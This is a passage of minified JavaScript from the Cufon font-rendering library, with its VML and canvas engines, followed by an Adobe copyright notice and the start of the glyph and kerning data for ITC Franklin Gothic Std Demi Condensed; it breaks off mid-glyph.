H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1995, 2001, 2002 Adobe Systems Incorporated. All rights reserved.
 * 
 * Trademark:
 * ITC is a trademark of International Typeface Corporation registered in the U.S.
 * Patent and Trademark Office and may be registered in certain other
 * jurisdictions. Franklin Gothic is a trademark of International Typeface
 * Corporation and may be registered in certain jurisdictions.
 * 
 * Full name:
 * ITCFranklinGothicStd-DmCd
 * 
 * Designer:
 * Vic Caruso
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"16,-75r0,-30v27,6,18,-53,18,-80v0,-56,19,-56,62,-55r0,24v-47,-6,9,119,-40,126v31,3,21,57,21,95v0,27,1,30,19,31r0,24v-43,1,-62,2,-62,-55v-6,-29,16,-78,-18,-80","w":122},{"d":"73,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm132,-223v-2,26,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19","w":165},{"d":"117,-243r0,126r-54,0r0,-126r54,0xm117,-63r0,126r-54,0r0,-126r54,0","w":180},{"d":"107,-211r-14,14r-65,-40r20,-30","w":165},{"d":"55,-242r30,0r0,117r25,0r0,29r-91,0r0,-29r26,0r0,-72v-11,8,-16,11,-26,16r0,-34v16,-8,26,-15,36,-27xm185,-240r31,0r-113,240r-31,0xm201,-89r-37,-7v2,-14,9,-50,54,-50v40,0,51,26,51,43v0,33,-33,52,-62,70r64,0r-3,33r-103,0r0,-31v58,-44,63,-57,63,-71v0,-10,-5,-14,-12,-14v-10,0,-14,8,-15,27","w":288},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm118,-211r-15,14r-65,-40r20,-30","w":171},{"d":"42,-240r53,0r0,159v0,44,-2,85,-64,85v-12,0,-20,-2,-33,-4r0,-44v28,5,44,3,44,-37r0,-159","w":116,"k":{",":18,".":18,"A":4,"\u00c6":4,"\u00c1":4,"\u00c2":4,"\u00c4":4,"\u00c0":4,"\u00c5":4,"\u00c3":4,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11,"e":7,"\u00e9":7,"\u00ea":7,"\u00eb":7,"\u00e8":7,"o":7,"\u00f8":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}},{"d":"100,-220v-19,0,-28,22,-28,57r0,184r-49,0r0,-143r-19,0r0,-39r19,0v0,-17,1,-53,30,-76v15,-12,35,-17,55,-17v55,0,62,38,62,52v0,30,-23,47,-54,57v25,21,76,23,76,81v0,60,-56,81,-107,60r13,-33v14,11,57,5,50,-17v2,-35,-74,-47,-64,-81v0,-12,3,-22,6,-30v10,-1,34,-6,34,-30v0,-14,-8,-25,-24,-25","w":196,"k":{"w":7}},{"d":"33,-236r99,0r0,26r-99,0r0,-26","w":165},{"d":"23,-240r145,0r0,41r-93,0r0,56r73,0r0,41r-73,0r0,59r93,0r0,43r-145,0r0,-240xm89,-282v0,25,-40,26,-41,0v0,-12,9,-20,20,-20v11,0,21,8,21,20xm150,-282v-2,25,-39,26,-41,0v0,-12,9,-20,20,-20v11,0,21,8,21,20","w":171},{"d":"105,18v17,-4,40,11,37,29v6,33,-59,38,-77,18r6,-16v9,4,37,19,41,-1v2,-9,-16,-20,-32,-15r10,-30v-9,-2,-28,-5,-44,-22v-25,-27,-32,-66,-32,-101v0,-44,11,-124,91,-124v61,0,79,51,82,93r-48,4v-1,-19,-4,-54,-34,-54v-30,0,-36,36,-36,85v0,40,5,77,36,77v28,0,33,-35,34,-48r49,3v-1,9,-2,39,-24,63v-18,21,-41,24,-53,25","w":196},{"d":"126,-72r0,-58r-108,0r0,-38r148,0r0,96r-40,0"},{"d":"66,-211r59,-56r20,30r-65,40","w":165},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm19,-261r73,-53r73,53r-40,0r-33,-18r-33,18r-40,0","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"170,-188r-44,17v-3,-9,-10,-30,-34,-30v-18,0,-25,12,-25,22v0,17,15,22,41,32v27,10,66,25,66,74v0,66,-96,108,-148,51v-13,-15,-17,-30,-20,-40r46,-13v3,11,9,36,38,36v18,0,31,-10,31,-26v0,-17,-15,-24,-33,-30v-33,-12,-73,-26,-73,-75v0,-37,24,-74,77,-74v60,0,73,40,78,56","k":{",":5,".":5}},{"d":"192,-58r32,0r0,-55xm185,-240r31,0r-113,240r-31,0xm218,-146r42,0r0,84r17,0r0,30r-17,0r0,32r-40,0r0,-32r-55,0r0,-28xm54,-242r30,0r0,117r25,0r0,29r-91,0r0,-29r26,0r0,-72v-11,8,-16,11,-26,16r0,-34v16,-8,26,-15,36,-27","w":288},{"d":"51,-240r146,300r-33,0r-146,-300r33,0","w":190},{"d":"23,-240r52,0r0,33v34,0,65,-5,86,18v32,35,29,92,-5,119v-25,20,-51,13,-81,14r0,56r-52,0r0,-240xm126,-133v0,-44,-24,-34,-51,-35r0,71v30,0,51,3,51,-36"},{"d":"23,-240r52,0r0,240r-52,0r0,-240xm17,-277r74,-39r12,34r-75,24","w":97},{"d":"95,-244v36,-2,72,24,72,61v0,32,-21,46,-31,52v10,6,37,22,37,62v0,23,-12,73,-84,73v-37,0,-78,-27,-78,-66v0,-35,23,-47,39,-56v-11,-8,-32,-22,-32,-57v0,-43,23,-66,77,-69xm104,-147v7,-8,17,-17,17,-33v0,-6,-1,-30,-26,-30v-17,0,-28,12,-28,27v0,11,4,21,37,36xm80,-101v-10,6,-23,15,-23,35v0,19,12,33,34,33v56,-12,31,-55,-11,-68"},{"d":"142,-29r-26,0r-37,-63r37,-63r26,0r-22,63xm81,-29r-26,0r-37,-63r37,-63r26,0r-22,63","w":159},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm115,-277r-11,19r-75,-24r12,-34","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"92,-148r41,-41r28,28r-41,41r41,41r-28,28r-41,-41r-41,41r-28,-28r41,-41r-41,-41r28,-28"},{"d":"164,-103r36,2v-3,37,-26,55,-57,55v-49,0,-61,-41,-61,-73v0,-39,14,-75,61,-75v52,0,55,44,56,58r-36,2v-1,-13,-1,-31,-19,-31v-15,0,-21,15,-21,47v0,25,3,43,21,43v17,0,19,-19,20,-28xm140,4v-69,0,-126,-55,-126,-124v0,-68,57,-124,126,-124v70,0,126,56,126,124v0,69,-57,124,-126,124xm140,-23v53,0,95,-43,95,-97v0,-53,-42,-97,-95,-97v-52,0,-95,44,-95,97v0,54,43,97,95,97","w":280},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"9,-240r51,0r36,97r38,-97r41,0r-39,93r36,0r0,27r-47,0r-9,21r56,0r0,27r-56,0r0,72r-48,0r0,-72r-54,0r0,-27r54,0r-9,-21r-45,0r0,-27r34,0"},{"d":"114,-109v11,64,-44,67,-44,109v0,19,14,23,21,23v24,0,25,-29,25,-43r45,6v-3,55,-32,80,-74,80v-63,0,-70,-49,-70,-67v0,-58,58,-60,55,-108r42,0xm116,-126r-47,0r0,-51r47,0r0,51","w":171},{"d":"186,-240v-8,104,36,244,-81,244v-82,0,-82,-56,-82,-107r0,-137r52,0r0,137v0,35,0,64,34,64v35,0,31,-19,32,-64r0,-137r45,0xm122,-277r-10,19r-76,-24r12,-34","w":208,"k":{",":18,".":18,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},{"d":"66,-240r-6,105r-33,0r-7,-105r46,0","w":86},{"d":"120,3v8,-33,-95,-39,-95,-98v0,-31,19,-42,28,-48v-34,-26,-26,-101,45,-101v50,0,62,31,67,45r-37,11v-3,-10,-7,-23,-28,-23v-16,0,-22,10,-22,20v0,14,7,18,34,30v23,11,50,23,50,61v0,26,-12,37,-24,47v9,7,26,20,26,50v2,66,-85,83,-129,43v-10,-10,-13,-24,-16,-34r41,-7v2,9,6,28,33,28v7,0,27,-1,27,-24xm76,-128v-14,11,-15,38,9,47v4,3,24,11,28,13v32,-33,-17,-49,-37,-60"},{"d":"155,-81r-93,0v0,24,0,50,24,50v21,0,24,-18,25,-30r44,3v-4,17,-13,62,-70,62v-77,0,-89,-85,-61,-152v21,-47,102,-37,118,-1v11,25,13,46,13,68xm62,-109r46,0v0,-10,1,-40,-23,-40v-22,0,-23,27,-23,40xm12,-199r71,-55r70,55r-38,0r-32,-21r-32,21r-39,0","w":165,"k":{"g":9}},{"d":"108,-105r0,30v-34,1,-18,47,-18,80v0,58,-20,56,-63,55r0,-24v48,6,-8,-119,41,-126v-31,-2,-21,-58,-21,-95v0,-26,-2,-31,-20,-31r0,-24v43,-1,63,-1,63,55v0,27,-11,87,18,80","w":122},{"d":"168,-240r0,300r-28,0r0,-272r-17,0r0,272r-28,0r0,-153v-41,0,-87,7,-87,-75v0,-22,4,-49,26,-62v35,-20,86,-7,134,-10","w":196},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm125,-290v0,47,-70,47,-70,0v0,-21,17,-35,35,-35v18,0,35,13,35,35xm76,-290v1,19,27,20,28,0v0,-9,-7,-15,-14,-15v-7,0,-14,6,-14,15","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm69,-211r60,-56r19,30r-64,40","w":171},{"d":"18,-240r49,0r0,85v5,-8,16,-25,38,-25v28,0,56,24,56,89v0,22,-2,94,-60,94v-19,0,-28,-10,-33,-16r-1,73r-49,0r0,-300xm90,-147v-29,0,-22,43,-23,75v0,26,0,40,21,40v21,0,22,-23,22,-61v0,-36,-4,-54,-20,-54","w":171,"k":{"v":7,"y":7,"\u00fd":7,"\u00ff":7,",":14,".":14}},{"d":"81,-204r-40,-4v8,-34,42,-36,54,-36v79,5,34,64,51,122r-35,0v-1,-6,-2,-9,-2,-17v-9,22,-72,32,-72,-15v0,-32,28,-42,66,-44v5,-22,-23,-25,-22,-6xm103,-176v-17,-8,-38,25,-15,30v15,0,15,-20,15,-30"},{"d":"80,-240r162,0r0,41r-89,0r0,56r70,0r0,41r-70,0r0,59r89,0r0,43r-139,0r0,-55r-52,0r-20,55r-45,0xm64,-94r40,0r0,-111","w":245},{"d":"13,-111r72,0r0,39r-72,0r0,-39","w":98},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"160,-100v2,23,-27,66,-52,64r0,39r-26,0r0,-39v-7,-1,-16,-3,-26,-9v-31,-22,-32,-67,-32,-75v0,-19,3,-84,58,-89r0,-33r26,0r0,33v26,-3,57,44,52,64r-42,3v-1,-11,-3,-33,-22,-33v-18,0,-23,17,-23,52v0,32,5,51,23,51v18,0,20,-17,22,-32"},{"d":"155,-81r-93,0v0,24,0,50,24,50v21,0,24,-18,25,-30r44,3v-4,17,-13,62,-70,62v-77,0,-89,-85,-61,-152v21,-47,102,-37,118,-1v11,25,13,46,13,68xm62,-109r46,0v0,-10,1,-40,-23,-40v-22,0,-23,27,-23,40xm66,-211r59,-56r20,30r-65,40","w":165,"k":{"g":9}},{"d":"26,-240r74,0r0,22r-30,0r0,256r30,0r0,22r-74,0r0,-300","w":122},{"d":"241,-81r-92,0v-1,34,5,50,23,50v20,0,24,-19,25,-29r42,3v-4,21,-13,61,-67,61v-36,0,-46,-22,-51,-31v-5,8,-19,31,-56,31v-72,0,-66,-79,-17,-104v14,-7,29,-8,53,-11v1,-21,1,-38,-19,-38v-15,0,-21,10,-22,29r-43,-5v3,-18,12,-56,68,-56v17,0,32,3,42,18v7,-7,19,-18,45,-18v54,1,70,42,69,100xm149,-109r45,0v0,-19,-3,-40,-22,-40v-20,0,-22,27,-23,40xm101,-85v-21,3,-39,6,-39,33v0,10,3,23,17,23v23,0,23,-36,22,-56","w":251},{"d":"16,-177r49,0r0,114v0,18,0,28,17,28v22,0,22,-14,22,-52r0,-90r49,0r0,177r-46,0r0,-24v-9,15,-17,28,-46,28v-45,0,-45,-34,-45,-66r0,-115xm76,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm136,-223v-2,26,-39,24,-41,0v0,-11,10,-19,21,-19v11,0,20,8,20,19","w":171},{"d":"183,-254r-20,38v21,27,25,62,25,96v0,39,-5,124,-86,124v-21,0,-35,-6,-43,-10r-11,21r-27,0r19,-38v-9,-12,-26,-34,-26,-97v0,-37,4,-124,86,-124v15,0,31,3,44,11r11,-21r28,0xm67,-76r56,-119v-46,-31,-62,26,-58,82v0,14,-1,20,2,37xm135,-162r-55,119v51,30,60,-34,58,-85v0,-13,0,-17,-3,-34","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58xm100,-211r-15,14r-64,-40r19,-30","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"20,-177r49,0r0,171v0,35,0,71,-46,71v-10,0,-18,-1,-26,-2r0,-41v19,3,23,-2,23,-29r0,-170xm69,-193r-50,0r0,-49r50,0r0,49","w":86},{"d":"155,-81r-93,0v0,24,0,50,24,50v21,0,24,-18,25,-30r44,3v-4,17,-13,62,-70,62v-77,0,-89,-85,-61,-152v21,-47,102,-37,118,-1v11,25,13,46,13,68xm62,-109r46,0v0,-10,1,-40,-23,-40v-22,0,-23,27,-23,40xm104,-211r-15,14r-65,-40r20,-30","w":165,"k":{"g":9}},{"d":"23,-240r145,0r0,41r-93,0r0,56r73,0r0,41r-73,0r0,59r93,0r0,43r-145,0r0,-240xm122,-277r-10,19r-76,-24r12,-34","w":171},{"d":"127,-196r23,0r-16,34v7,8,21,25,21,73v0,70,-43,108,-104,87r-11,23r-23,0r17,-35v-8,-9,-24,-26,-24,-75v0,-53,18,-92,72,-92v19,0,28,3,34,